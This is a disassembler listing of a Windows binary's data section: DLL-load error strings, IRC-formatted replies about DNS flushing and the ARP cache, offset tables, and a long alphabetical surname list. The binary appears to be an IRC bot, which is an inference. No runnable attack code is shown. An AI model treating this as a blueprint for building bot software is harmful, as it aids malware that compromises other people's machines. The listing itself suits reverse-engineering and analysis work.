aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+1C8�o
; char aNetapi32_dllFa[]
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+194�o
align 4
; char aIcmp_dllFailed[]
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+160�o
align 4
; char aWininet_dllFai[]
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+12C�o
align 10h
; char aWs2_32_dllFail[]
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+F8�o
; char aGdi32_dllFaile[]
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+C4�o
align 10h
; char aAdvapi32_dllFa[]
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+90�o
align 4
; char aUser32_dllFail[]
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+5C�o
; char aKernel32_dllFa[]
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_40A5C5+28�o
align 10h
; char a__0[]
a__0: ; DATA XREF: sub_41036B+252�o
unicode 0, <.>,0
unk_42D854 db 2Dh ; - ; DATA XREF: sub_40A928:loc_40A9E7�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aNotSupportedBy db 'not supported by this system',0
align 4
; char asc_42D884[]
asc_42D884 db '-' ; DATA XREF: sub_40A928:loc_40A9B5�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aUnableToAlloca db 'unable to allocate ARP cache',0
align 4
unk_42D8B4 db 2Dh ; - ; DATA XREF: sub_40A928:loc_40A981�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheIsEmpt db 'ARP cache is empty',0
align 4
; char asc_42D8D8[]
asc_42D8D8 db '-' ; DATA XREF: sub_40A928+49�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aErrorGettingAr db 'error getting ARP cache: %d',0
; char aD_D_D_D[]
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_40AA06+46�o
; sub_40C2AF+38�o ...
aReal db 'real',0
align 4
dd 0
dword_42D91C dd 0 ; DATA XREF: sub_40AE84+7�o
off_42D920 dd offset sub_40AAAC ; DATA XREF: sub_40AE84+49�r
aConst db 'const',0
align 10h
dd 1, 40AB19h, 7474656Ch, 7265h, 0
dd 2, 40AB77h, 706D6F63h, 2 dup(0)
dd 3, 40ABC4h, 6E756F63h, 797274h, 0
dd 4, 40AC62h, 736Fh, 2 dup(0)
dd 5, 40ACD7h, 6E6C6C61h, 6B6369h, 0
dd 6, 40AEEDh
off_42D99C dd offset aAbdulrazak ; DATA XREF: sub_40AAAC+21�r
; "Abdulrazak"
dd offset aAckerman ; "Ackerman"
dd offset aAdams ; "Adams"
off_42D9A8 dd offset aAddison ; DATA XREF: sub_40AE84+39�o
; "Addison"
dd offset aAdelstein ; "Adelstein"
dd offset aAdibe ; "Adibe"
dd offset aAdorno ; "Adorno"
dd offset aAhlers ; "Ahlers"
dd offset aAlavi ; "Alavi"
dd offset aAlcorn ; "Alcorn"
dd offset aAlda ; "Alda"
dd offset aAleks ; "Aleks"
dd offset aAllison ; "Allison"
dd offset aAlongi ; "Alongi"
dd offset aAltavilla ; "Altavilla"
dd offset aAltenberger ; "Altenberger"
dd offset aAltenhofen ; "Altenhofen"
dd offset aAmaral ; "Amaral"
dd offset aAmatangelo ; "Amatangelo"
dd offset aAmeer ; "Ameer"
dd offset aAmsden ; "Amsden"
dd offset aAnand ; "Anand"
dd offset aAndel ; "Andel"
dd offset aAndo ; "Ando"
dd offset aAndrelus ; "Andrelus"
dd offset aAndron ; "Andron"
dd offset aAnfinrud ; "Anfinrud"
dd offset aAnsley ; "Ansley"
dd offset aAnthony ; "Anthony"
dd offset aAntos ; "Antos"
dd offset aArbia ; "Arbia"
dd offset aArduini ; "Arduini"
dd offset aArellano ; "Arellano"
dd offset aAristotle ; "Aristotle"
dd offset aArjas ; "Arjas"
dd offset aArky ; "Arky"
dd offset aAtkins ; "Atkins"
dd offset aAugustus ; "Augustus"
dd offset aAurelius ; "Aurelius"
dd offset aAxelrod ; "Axelrod"
dd offset aAxworthy ; "Axworthy"
dd offset aAyiemba ; "Ayiemba"
dd offset aAykroyd ; "Aykroyd"
dd offset aAyling ; "Ayling"
dd offset aAzima ; "Azima"
dd offset aBachmuth ; "Bachmuth"
dd offset aBackus ; "Backus"
dd offset aBady ; "Bady"
dd offset aBaglivo ; "Baglivo"
dd offset aBagnold ; "Bagnold"
dd offset aBailar ; "Bailar"
dd offset aBakanowsky ; "Bakanowsky"
dd offset aBaleja ; "Baleja"
dd offset aBallatori ; "Ballatori"
dd offset aBallew ; "Ballew"
dd offset aBaltz ; "Baltz"
dd offset aBanta ; "Banta"
dd offset aBarabesi ; "Barabesi"
dd offset aBarajas ; "Barajas"
dd offset aBaranczak ; "Baranczak"
dd offset aBaranowska ; "Baranowska"
dd offset aBarberi ; "Barberi"
dd offset aBarbetti ; "Barbetti"
dd offset aBarneson ; "Barneson"
dd offset aBarnett ; "Barnett"
dd offset aBarriola ; "Barriola"
dd offset aBarry ; "Barry"
dd offset aBartholomew ; "Bartholomew"
dd offset aBartolome ; "Bartolome"
dd offset aBartoo ; "Bartoo"
dd offset aBasavappa ; "Basavappa"
dd offset aBashevis ; "Bashevis"
dd offset aBatchelder ; "Batchelder"
dd offset aBaumiller ; "Baumiller"
dd offset aBayles ; "Bayles"
dd offset aBayo ; "Bayo"
dd offset aBeacon ; "Beacon"
dd offset aBeal ; "Beal"
dd offset aBean ; "Bean"
dd offset aBeckman ; "Beckman"
dd offset aBeder ; "Beder"
dd offset aBedford ; "Bedford"
dd offset aBehenna ; "Behenna"
dd offset aBelanger ; "Belanger"
dd offset aBelaoussof ; "Belaoussof"
dd offset aBelfer ; "Belfer"
dd offset aBelinCollart ; "Belin-Collart"
dd offset aBellavance ; "Bellavance"
dd offset aBellhouse ; "Bellhouse"
dd offset aBellini ; "Bellini"
dd offset aBelloc ; "Belloc"
dd offset aBenedictDye ; "Benedict-Dye"
dd offset aBergson ; "Bergson"
dd offset aBerkeJenkins ; "Berke-Jenkins"
dd offset aBernardo ; "Bernardo"
dd offset aBernassola ; "Bernassola"
dd offset aBernston ; "Bernston"
dd offset aBerrizbeitia ; "Berrizbeitia"
dd offset aBetti ; "Betti"
dd offset aBeynart ; "Beynart"
dd offset aBiagioli ; "Biagioli"
dd offset aBickel ; "Bickel"
dd offset aBinion ; "Binion"
dd offset aBir ; "Bir"
dd offset aBisema ; "Bisema"
dd offset aBisho ; "Bisho"
dd offset aBlackbourn ; "Blackbourn"
dd offset aBlackwell ; "Blackwell"
dd offset aBlagg ; "Blagg"
dd offset aBlakemore ; "Blakemore"
dd offset aBlanke ; "Blanke"
dd offset aBliss ; "Bliss"
dd offset aBlizard ; "Blizard"
dd offset aBloch ; "Bloch"
dd offset aBloembergen ; "Bloembergen"
dd offset aBloemhof ; "Bloemhof"
dd offset aBloxham ; "Bloxham"
dd offset aBlyth ; "Blyth"
dd offset aBolger ; "Bolger"
dd offset aBolick ; "Bolick"
dd offset aBollinger ; "Bollinger"
dd offset aBologna ; "Bologna"
dd offset aBoner ; "Boner"
dd offset aBonham ; "Bonham"
dd offset aBoniface ; "Boniface"
dd offset aBontempo ; "Bontempo"
dd offset aBook ; "Book"
dd offset aBookbinder ; "Bookbinder"
dd offset aBoone ; "Boone"
dd offset aBoorstin ; "Boorstin"
dd offset aBorack ; "Borack"
dd offset aBorden ; "Borden"
dd offset aBossi ; "Bossi"
dd offset aBothman ; "Bothman"
dd offset aBotosh ; "Botosh"
dd offset aBoudin ; "Boudin"
dd offset aBoudrot ; "Boudrot"
dd offset aBourneuf ; "Bourneuf"
dd offset aBowers ; "Bowers"
dd offset aBoxer ; "Boxer"
dd offset aBoyajian ; "Boyajian"
dd offset aBoyes ; "Boyes"
dd offset aBoyland ; "Boyland"
dd offset aBoym ; "Boym"
dd offset aBoyne ; "Boyne"
dd offset aBracalente ; "Bracalente"
dd offset aBradac ; "Bradac"
dd offset aBradach ; "Bradach"
dd offset aBrecht ; "Brecht"
dd offset aBreed ; "Breed"
dd offset aBrenan ; "Brenan"
dd offset aBrennan ; "Brennan"
dd offset aBrewer ; "Brewer"
dd offset aBrewer ; "Brewer"
dd offset aBridgeman ; "Bridgeman"
dd offset aBridges ; "Bridges"
dd offset aBrinton ; "Brinton"
dd offset aBritz ; "Britz"
dd offset aBroca ; "Broca"
dd offset aBrook ; "Brook"
dd offset aBrzycki ; "Brzycki"
dd offset aBuchan ; "Buchan"
dd offset aBudding ; "Budding"
dd offset aBullard ; "Bullard"
dd offset aBunton ; "Bunton"
dd offset aBurden ; "Burden"
dd offset aBurdzy ; "Burdzy"
dd offset aBurke ; "Burke"
dd offset aBurridge ; "Burridge"
dd offset aBusetta ; "Busetta"
dd offset aByatt ; "Byatt"
dd offset aByerly ; "Byerly"
dd offset aByrd ; "Byrd"
dd offset aCage ; "Cage"
dd offset aCalnan ; "Calnan"
dd offset aCammelli ; "Cammelli"
dd offset aCammilleri ; "Cammilleri"
dd offset aCanley ; "Canley"
dd offset aCapanni ; "Capanni"
dd offset aCaperton ; "Caperton"
dd offset aCapocaccia ; "Capocaccia"
dd offset aCapodilupo ; "Capodilupo"
dd offset aCappuccio ; "Cappuccio"
dd offset aCapursi ; "Capursi"
dd offset aCaratozzolo ; "Caratozzolo"
dd offset aCarayannopoulo ; "Carayannopoulos"
dd offset aCarlin ; "Carlin"
dd offset aCarlos ; "Carlos"
dd offset aCarlyle ; "Carlyle"
dd offset aCarmichael ; "Carmichael"
dd offset aCaroti ; "Caroti"
dd offset aCarper ; "Carper"
dd offset aCartmill ; "Cartmill"
dd offset aCascio ; "Cascio"
dd offset aCase ; "Case"
dd offset aCaspar ; "Caspar"
dd offset aCastelda ; "Castelda"
dd offset aCavanagh ; "Cavanagh"
dd offset aCavell ; "Cavell"
dd offset aCeniceros ; "Ceniceros"
dd offset aCerioli ; "Cerioli"
dd offset aChapman ; "Chapman"
dd offset aCharles ; "Charles"
dd offset aCheang ; "Cheang"
dd offset aCherry ; "Cherry"
dd offset aChervinsky ; "Chervinsky"
dd offset aChiassino ; "Chiassino"
dd offset aChien ; "Chien"
dd offset aChildress ; "Childress"
dd offset aChilds ; "Childs"
dd offset aChinipardaz ; "Chinipardaz"
dd offset aChinman ; "Chinman"
dd offset aChristenson ; "Christenson"
dd offset aChristian ; "Christian"
dd offset aChristiano ; "Christiano"
dd offset aChristie ; "Christie"
dd offset aChristopher ; "Christopher"
dd offset aChu ; "Chu"
dd offset aChupasko ; "Chupasko"
dd offset aChurch ; "Church"
dd offset aCiampaglia ; "Ciampaglia"
dd offset aCicero ; "Cicero"
dd offset aCifarelli ; "Cifarelli"
dd offset aClaffey ; "Claffey"
dd offset aClancy ; "Clancy"
dd offset aClark ; "Clark"
dd offset aClement ; "Clement"
dd offset aClifton ; "Clifton"
dd offset aClow ; "Clow"
dd offset aCoblenz ; "Coblenz"
dd offset aCoito ; "Coito"
dd offset aColdren ; "Coldren"
dd offset aColella ; "Colella"
dd offset aCollard ; "Collard"
dd offset aCollis ; "Collis"
dd offset aCompton ; "Compton"
dd offset aCompton ; "Compton"
dd offset aComstock ; "Comstock"
dd offset aConcino ; "Concino"
dd offset aCondodina ; "Condodina"
dd offset aConnors ; "Connors"
dd offset aCorey ; "Corey"
dd offset aCornish ; "Cornish"
dd offset aCosmides ; "Cosmides"
dd offset aCounter ; "Counter"
dd offset aCoutaux ; "Coutaux"
dd offset aCrawford ; "Crawford"
dd offset aCrocker ; "Crocker"
dd offset aCroshaw ; "Croshaw"
dd offset aCroxen ; "Croxen"
dd offset aCroxton ; "Croxton"
dd offset aCui ; "Cui"
dd offset aCurrier ; "Currier"
dd offset aCutler ; "Cutler"
dd offset aCvek ; "Cvek"
dd offset aCyders ; "Cyders"
dd offset aDasilva ; "daSilva"
dd offset aDaldalian ; "Daldalian"
dd offset aDaly ; "Daly"
dd offset aDAmbra ; "D'Ambra"
dd offset aDanieli ; "Danieli"
dd offset aDante ; "Dante"
dd offset aDapice ; "Dapice"
dd offset aDArcangelo ; "D'arcangelo"
dd offset aDas ; "Das"
dd offset aDasgupta ; "Dasgupta"
dd offset aDaskalu ; "Daskalu"
dd offset aDavid ; "David"
dd offset aDawkins ; "Dawkins"
dd offset aDegennaro ; "DeGennaro"
dd offset aDelapena ; "DeLaPena"
dd offset aDelEnclos ; "del'Enclos"
dd offset aDerousse ; "deRousse"
dd offset aDebroff ; "Debroff"
dd offset aDees ; "Dees"
dd offset aDefeciani ; "Defeciani"
dd offset aDelattre ; "Delattre"
dd offset aDeleonRendon ; "Deleon-Rendon"
dd offset aDelger ; "Delger"
dd offset aDellAcqua ; "Dell'acqua"
dd offset aDeming ; "Deming"
dd offset aDempster ; "Dempster"
dd offset aDemusz ; "Demusz"
dd offset aDenault ; "Denault"
dd offset aDenham ; "Denham"
dd offset aDenison ; "Denison"
dd offset aDesombre ; "Desombre"
dd offset aDeutsch ; "Deutsch"
dd offset aDFini ; "D'fini"
dd offset aDicks ; "Dicks"
dd offset aDiefenbach ; "Diefenbach"
dd offset aDifabio ; "Difabio"
dd offset aDifronzo ; "Difronzo"
dd offset aDilworth ; "Dilworth"
dd offset aDionysius ; "Dionysius"
dd offset aDirksen ; "Dirksen"
dd offset aDockery ; "Dockery"
dd offset aDoherty ; "Doherty"
dd offset aDonahue ; "Donahue"
dd offset aDonner ; "Donner"
dd offset aDoonan ; "Doonan"
dd offset aDore ; "Dore"
dd offset aDorf ; "Dorf"
dd offset aDosi ; "Dosi"
dd offset aDoty ; "Doty"
dd offset aDoug ; "Doug"
dd offset aDowsland ; "Dowsland"
dd offset aDrinker ; "Drinker"
dd offset aDSouza ; "D'souza"
dd offset aDuffin ; "Duffin"
dd offset aDurrett ; "Durrett"
dd offset aDussault ; "Dussault"
dd offset aDwyer ; "Dwyer"
dd offset aEardley ; "Eardley"
dd offset aEbeling ; "Ebeling"
dd offset aEckel ; "Eckel"
dd offset aEdley ; "Edley"
dd offset aEdner ; "Edner"
dd offset aEdward ; "Edward"
dd offset aEickenhorst ; "Eickenhorst"
dd offset aEliasson ; "Eliasson"
dd offset aElmendorf ; "Elmendorf"
dd offset aElmerick ; "Elmerick"
dd offset aElvis ; "Elvis"
dd offset aEncinas ; "Encinas"
dd offset aEnyeart ; "Enyeart"
dd offset aEppling ; "Eppling"
dd offset aErbach ; "Erbach"
dd offset aErdman ; "Erdman"
dd offset aErdos ; "Erdos"
dd offset aErez ; "Erez"
dd offset aEspinoza ; "Espinoza"
dd offset aEstes ; "Estes"
dd offset aEtter ; "Etter"
dd offset aEuripides ; "Euripides"
dd offset aEverett ; "Everett"
dd offset aFabbris ; "Fabbris"
dd offset aFagan ; "Fagan"
dd offset aFaioes ; "Faioes"
dd offset aFalcoAcosta ; "Falco-Acosta"
dd offset aFalorsi ; "Falorsi"
dd offset aFaris ; "Faris"
dd offset aFarone ; "Farone"
dd offset aFarren ; "Farren"
dd offset aFasso ; "Fasso'"
dd offset aFates ; "Fates"
dd offset aFeigenbaum ; "Feigenbaum"
dd offset aFejzo ; "Fejzo"
dd offset aFeldman ; "Feldman"
dd offset aFernald ; "Fernald"
dd offset aFernandes ; "Fernandes"
dd offset aFerrante ; "Ferrante"
dd offset aFerriell ; "Ferriell"
dd offset aFeuer ; "Feuer"
dd offset aFido ; "Fido"
dd offset aField ; "Field"
dd offset aFink ; "Fink"
dd offset aFinkelstein ; "Finkelstein"
dd offset aFinnegan ; "Finnegan"
dd offset aFiorina ; "Fiorina"
dd offset aFisk ; "Fisk"
dd offset aFitzmaurice ; "Fitzmaurice"
dd offset aFlier ; "Flier"
dd offset aFlores ; "Flores"
dd offset aFolks ; "Folks"
dd offset aForester ; "Forester"
dd offset aFortes ; "Fortes"
dd offset aFortier ; "Fortier"
dd offset aFossey ; "Fossey"
dd offset aFossi ; "Fossi"
dd offset aFrancisco ; "Francisco"
dd offset aFranklinKenea ; "Franklin-Kenea"
dd offset aFranz ; "Franz"
dd offset aFrazierDavis ; "Frazier-Davis"
dd offset aFreid ; "Freid"
dd offset aFreundlich ; "Freundlich"
dd offset aFried ; "Fried"
dd offset aFriedland ; "Friedland"
dd offset aFrisken ; "Frisken"
dd offset aFrowiss ; "Frowiss"
dd offset aFryberger ; "Fryberger"
dd offset aFrye ; "Frye"
dd offset aFujiiAbe ; "Fujii-Abe"
dd offset aFuller ; "Fuller"
dd offset aFurth ; "Furth"
dd offset aFusaro ; "Fusaro"
dd offset aGabrielli ; "Gabrielli"
dd offset aGaggiotti ; "Gaggiotti"
dd offset aGaleotti ; "Galeotti"
dd offset aGalwey ; "Galwey"
dd offset aGambini ; "Gambini"
dd offset aGarfield ; "Garfield"
dd offset aGarman ; "Garman"
dd offset aGaronna ; "Garonna"
dd offset aGeller ; "Geller"
dd offset aGemberling ; "Gemberling"
dd offset aGeorgi ; "Georgi"
dd offset aGerrett ; "Gerrett"
dd offset aGhorai ; "Ghorai"
dd offset aGibbens ; "Gibbens"
dd offset aGibson ; "Gibson"
dd offset aGilbert ; "Gilbert"
dd offset aGili ; "Gili"
dd offset aGill ; "Gill"
dd offset aGillispie ; "Gillispie"
dd offset aGist ; "Gist"
dd offset aGleason ; "Gleason"
dd offset aGlegg ; "Glegg"
dd offset aGlendon ; "Glendon"
dd offset aGoldfarb ; "Goldfarb"
dd offset aGoncalves ; "Goncalves"
dd offset aGood ; "Good"
dd offset aGoodearl ; "Goodearl"
dd offset aGoody ; "Goody"
dd offset aGozzi ; "Gozzi"
dd offset aGravell ; "Gravell"
dd offset aGreenberg ; "Greenberg"
dd offset aGreenfeld ; "Greenfeld"
dd offset aGriffiths ; "Griffiths"
dd offset aGrigoletto ; "Grigoletto"
dd offset aGrummell ; "Grummell"
dd offset aGruner ; "Gruner"
dd offset aGruppe ; "Gruppe"
dd offset aGuenthart ; "Guenthart"
dd offset aGunn ; "Gunn"
dd offset aGuo ; "Guo"
dd offset aHa ; "Ha"
dd offset aHaar ; "Haar"
dd offset aHackman ; "Hackman"
dd offset aHackshaw ; "Hackshaw"
dd offset aHaley ; "Haley"
dd offset aHalkias ; "Halkias"
dd offset aHallowell ; "Hallowell"
dd offset aHalpert ; "Halpert"
dd offset aHambarzumjan ; "Hambarzumjan"
dd offset aHamer ; "Hamer"
dd offset aHammerness ; "Hammerness"
dd offset aHand ; "Hand"
dd offset aHanssen ; "Hanssen"
dd offset aHarding ; "Harding"
dd offset aHargraves ; "Hargraves"
dd offset aHarlow ; "Harlow"
dd offset aHarrigan ; "Harrigan"
dd offset aHartman ; "Hartman"
dd offset aHartmann ; "Hartmann"
dd offset aHartnett ; "Hartnett"
dd offset aHarwell ; "Harwell"
dd offset aHaviaras ; "Haviaras"
dd offset aHawkes ; "Hawkes"
dd offset aHayes ; "Hayes"
dd offset aHaynes ; "Haynes"
dd offset aHazlewood ; "Hazlewood"
dd offset aHeermans ; "Heermans"
dd offset aHeft ; "Heft"
dd offset aHeiland ; "Heiland"
dd offset aHellman ; "Hellman"
dd offset aHellmiss ; "Hellmiss"
dd offset aHelprin ; "Helprin"
dd offset aHemphill ; "Hemphill"
dd offset aHenery ; "Henery"
dd offset aHenrichs ; "Henrichs"
dd offset aHernandez ; "Hernandez"
dd offset aHerrera ; "Herrera"
dd offset aHester ; "Hester"
dd offset aHeubert ; "Heubert"
dd offset aHeyeck ; "Heyeck"
dd offset aHimmelfarb ; "Himmelfarb"
dd offset aHind ; "Hind"
dd offset aHirst ; "Hirst"
dd offset aHitchcock ; "Hitchcock"
dd offset aHoang ; "Hoang"
dd offset aHock ; "Hock"
dd offset aHoffer ; "Hoffer"
dd offset aHoffman ; "Hoffman"
dd offset aHokanson ; "Hokanson"
dd offset aHokoda ; "Hokoda"
dd offset aHolmes ; "Holmes"
dd offset aHoloien ; "Holoien"
dd offset aHolter ; "Holter"
dd offset aHolway ; "Holway"
dd offset aHolzman ; "Holzman"
dd offset aHooker ; "Hooker"
dd offset aHopkins ; "Hopkins"
dd offset aHorsley ; "Horsley"
dd offset aHoshida ; "Hoshida"
dd offset aHostage ; "Hostage"
dd offset aHottle ; "Hottle"
dd offset aHoward ; "Howard"
dd offset aHoy ; "Hoy"
dd offset aHuey ; "Huey"
dd offset aHuidekoper ; "Huidekoper"
dd offset aHungerford ; "Hungerford"
dd offset aHuntington ; "Huntington"
dd offset aHupp ; "Hupp"
dd offset aHurtubise ; "Hurtubise"
dd offset aHutchings ; "Hutchings"
dd offset aHyde ; "Hyde"
dd offset aIaquinta ; "Iaquinta"
dd offset aIchikawa ; "Ichikawa"
dd offset aIgarashi ; "Igarashi"
dd offset aInamura ; "Inamura"
dd offset aInniss ; "Inniss"
dd offset aIsaac ; "Isaac"
dd offset aIsaievych ; "Isaievych"
dd offset aIsbill ; "Isbill"
dd offset aIsserman ; "Isserman"
dd offset aIyer ; "Iyer"
dd offset aJacenko ; "Jacenko"
dd offset aJackson ; "Jackson"
dd offset aJagers ; "Jagers"
dd offset aJagger ; "Jagger"
dd offset aJagoe ; "Jagoe"
dd offset aJain ; "Jain"
dd offset aJamil ; "Jamil"
dd offset aJanjigian ; "Janjigian"
dd offset aJarnagin ; "Jarnagin"
dd offset aJarrell ; "Jarrell"
dd offset aJay ; "Jay"
dd offset aJeffers ; "Jeffers"
dd offset aJellis ; "Jellis"
dd offset aJenkins ; "Jenkins"
dd offset aJespersen ; "Jespersen"
dd offset aJewett ; "Jewett"
dd offset aJohannesson ; "Johannesson"
dd offset aJohannsen ; "Johannsen"
dd offset aJohns ; "Johns"
dd offset aJolly ; "Jolly"
dd offset aJorgensen ; "Jorgensen"
dd offset aJucks ; "Jucks"
dd offset aJuliano ; "Juliano"
dd offset aJulious ; "Julious"
dd offset aKabbash ; "Kabbash"
dd offset aKaboolian ; "Kaboolian"
dd offset aKafadar ; "Kafadar"
dd offset aKalbfleisch ; "Kalbfleisch"
dd offset aKaligian ; "Kaligian"
dd offset aKalil ; "Kalil"
dd offset aKalinowski ; "Kalinowski"
dd offset aKalman ; "Kalman"
dd offset aKamel ; "Kamel"
dd offset aKangis ; "Kangis"
dd offset aKarpouzes ; "Karpouzes"
dd offset aKassower ; "Kassower"
dd offset aKasten ; "Kasten"
dd offset aKawachi ; "Kawachi"
dd offset aKee ; "Kee"
dd offset aKeenan ; "Keenan"
dd offset aKeepper ; "Keepper"
dd offset aKeith ; "Keith"
dd offset aKelker ; "Kelker"
dd offset aKelsey ; "Kelsey"
dd offset aKempton ; "Kempton"
dd offset aKemsley ; "Kemsley"
dd offset aKendall ; "Kendall"
dd offset aKerry ; "Kerry"
dd offset aKeul ; "Keul"
dd offset aKhong ; "Khong"
dd offset aKimmel ; "Kimmel"
dd offset aKimmett ; "Kimmett"
dd offset aKimura ; "Kimura"
dd offset aKindall ; "Kindall"
dd offset aKinsley ; "Kinsley"
dd offset aKippenberger ; "Kippenberger"
dd offset aKirscht ; "Kirscht"
dd offset aKittridge ; "Kittridge"
dd offset aKleckner ; "Kleckner"
dd offset aKleiman ; "Kleiman"
dd offset aKleinfelder ; "Kleinfelder"
dd offset aKlemperer ; "Klemperer"
dd offset aKling ; "Kling"
dd offset aKlinkenborg ; "Klinkenborg"
dd offset aKlint ; "Klint"
dd offset aKnuff ; "Knuff"
dd offset aKobrick ; "Kobrick"
dd offset aKoch ; "Koch"
dd offset aKohn ; "Kohn"
dd offset aKoivumaki ; "Koivumaki"
dd offset aKommer ; "Kommer"
dd offset aKoniaris ; "Koniaris"
dd offset aKonrad ; "Konrad"
dd offset aKool ; "Kool"
dd offset aKorzybski ; "Korzybski"
dd offset aKotter ; "Kotter"
dd offset aKovaks ; "Kovaks"
dd offset aKraemer ; "Kraemer"
dd offset aKrailo ; "Krailo"
dd offset aKrasney ; "Krasney"
dd offset aKraus ; "Kraus"
dd offset aKroemer ; "Kroemer"
dd offset aKrysiak ; "Krysiak"
dd offset aKuenzli ; "Kuenzli"
dd offset aKumar ; "Kumar"
dd offset aKusman ; "Kusman"
dd offset aKuwabara ; "Kuwabara"
dd offset aLa ; "La"
dd offset aLabunka ; "Labunka"
dd offset aLafler ; "Lafler"
dd offset aLaing ; "Laing"
dd offset aLallemant ; "Lallemant"
dd offset aLandes ; "Landes"
dd offset aLankes ; "Lankes"
dd offset aLantieri ; "Lantieri"
dd offset aLanzit ; "Lanzit"
dd offset aLaserna ; "Laserna"
dd offset aLashley ; "Lashley"
dd offset aLawless ; "Lawless"
dd offset aLecar ; "Lecar"
dd offset aLecce ; "Lecce"
dd offset aLeclercq ; "Leclercq"
dd offset aLeite ; "Leite"
dd offset aLenard ; "Lenard"
dd offset aLEnclos ; "l'Enclos"
dd offset aLesser ; "Lesser"
dd offset aLessi ; "Lessi"
dd offset aLiakos ; "Liakos"
dd offset aLidano ; "Lidano"
dd offset aLiem ; "Liem"
dd offset aLight ; "Light"
dd offset aLightfoot ; "Lightfoot"
dd offset aLim ; "Lim"
dd offset aLinares ; "Linares"
dd offset aLinda ; "Linda"
dd offset aLinder ; "Linder"
dd offset aLine ; "Line"
dd offset aLinehan ; "Linehan"
dd offset aLinzee ; "Linzee"
dd offset aLippmann ; "Lippmann"
dd offset aLipponen ; "Lipponen"
dd offset aLittle ; "Little"
dd offset aLitvak ; "Litvak"
dd offset aLivernash ; "Livernash"
dd offset aLivi ; "Livi"
dd offset aLivolsi ; "Livolsi"
dd offset aLizardo ; "Lizardo"
dd offset aLocatelli ; "Locatelli"
dd offset aLongworth ; "Longworth"
dd offset aLoss ; "Loss"
dd offset aLoveman ; "Loveman"
dd offset aLowenstein ; "Lowenstein"
dd offset aLoza ; "Loza"
dd offset aLubin ; "Lubin"
dd offset aLucas ; "Lucas"
dd offset aLuciano ; "Luciano"
dd offset aLuczkow ; "Luczkow"
dd offset aLuecke ; "Luecke"
dd offset aLunetta ; "Lunetta"
dd offset aLuoma ; "Luoma"
dd offset aLussier ; "Lussier"
dd offset aLutcavage ; "Lutcavage"
dd offset aLuzader ; "Luzader"
dd offset aMa ; "Ma"
dd offset aMaccormac ; "Maccormac"
dd offset aMacdonald ; "Macdonald"
dd offset aMaceachern ; "Maceachern"
dd offset aMacintyre ; "Macintyre"
dd offset aMackenney ; "Mackenney"
dd offset aMacmillan ; "MacMillan"
dd offset aMacy ; "Macy"
dd offset aMadigan ; "Madigan"
dd offset aMaggio ; "Maggio"
dd offset aMahony ; "Mahony"
dd offset aMaier ; "Maier"
dd offset aMaineHershey ; "Maine-Hershey"
dd offset aMaisano ; "Maisano"
dd offset aMalatesta ; "Malatesta"
dd offset aMaller ; "Maller"
dd offset aMalova ; "Malova"
dd offset aManalis ; "Manalis"
dd offset aMandel ; "Mandel"
dd offset aManganiello ; "Manganiello"
dd offset aMantovan ; "Mantovan"
dd offset aMarch ; "March"
dd offset aMarchbanks ; "Marchbanks"
dd offset aMarcus ; "Marcus"
dd offset aMargalit ; "Margalit"
dd offset aMargetts ; "Margetts"
dd offset aMarques ; "Marques"
dd offset aMartinez ; "Martinez"
dd offset aMartochio ; "Martochio"
dd offset aMarton ; "Marton"
dd offset aMarubini ; "Marubini"
dd offset aMass ; "Mass"
dd offset aMatalka ; "Matalka"
dd offset aMatarazzo ; "Matarazzo"
dd offset aMatsukata ; "Matsukata"
dd offset aMattson ; "Mattson"
dd offset aMauzy ; "Mauzy"
dd offset aMay ; "May"
dd offset aMazzali ; "Mazzali"
dd offset aMazziotta ; "Mazziotta"
dd offset aMcbride ; "Mcbride"
dd offset aMccaffery ; "Mccaffery"
dd offset aMccall ; "Mccall"
dd offset aMcclearn ; "Mcclearn"
dd offset aMcdowell ; "Mcdowell"
dd offset aMcelroy ; "Mcelroy"
dd offset aMcfadden ; "McFadden"
dd offset aMcghee ; "Mcghee"
dd offset aMcgoldrick ; "Mcgoldrick"
dd offset aMcilroy ; "McIlroy"
dd offset aMcintosh ; "Mcintosh"
dd offset aMckenna ; "Mckenna"
dd offset aMclane ; "Mclane"
dd offset aMclaren ; "Mclaren"
dd offset aMcnealy ; "Mcnealy"
dd offset aMcnulty ; "Mcnulty"
dd offset aMeccariello ; "Meccariello"
dd offset aMemisoglu ; "Memisoglu"
dd offset aMenzies ; "Menzies"
dd offset aMerikoski ; "Merikoski"
dd offset aMerlani ; "Merlani"
dd offset aMerminod ; "Merminod"
dd offset aMerseth ; "Merseth"
dd offset aMerz ; "Merz"
dd offset aMetelka ; "Metelka"
dd offset aMetropolis ; "Metropolis"
dd offset aMeurer ; "Meurer"
dd offset aMichelman ; "Michelman"
dd offset aMiddle ; "Middle"
dd offset aMieher ; "Mieher"
dd offset aMills ; "Mills"
dd offset aMinh ; "Minh"
dd offset aMini ; "Mini"
dd offset aMinichiello ; "Minichiello"
dd offset aGonzalez ; "Gonzalez"
dd offset aMitropoulos ; "Mitropoulos"
dd offset aMittal ; "Mittal"
dd offset aMocroft ; "Mocroft"
dd offset aModestino ; "Modestino"
dd offset aMoeller ; "Moeller"
dd offset aMohr ; "Mohr"
dd offset aMoiamedi ; "Moiamedi"
dd offset aMonque ; "Monque"
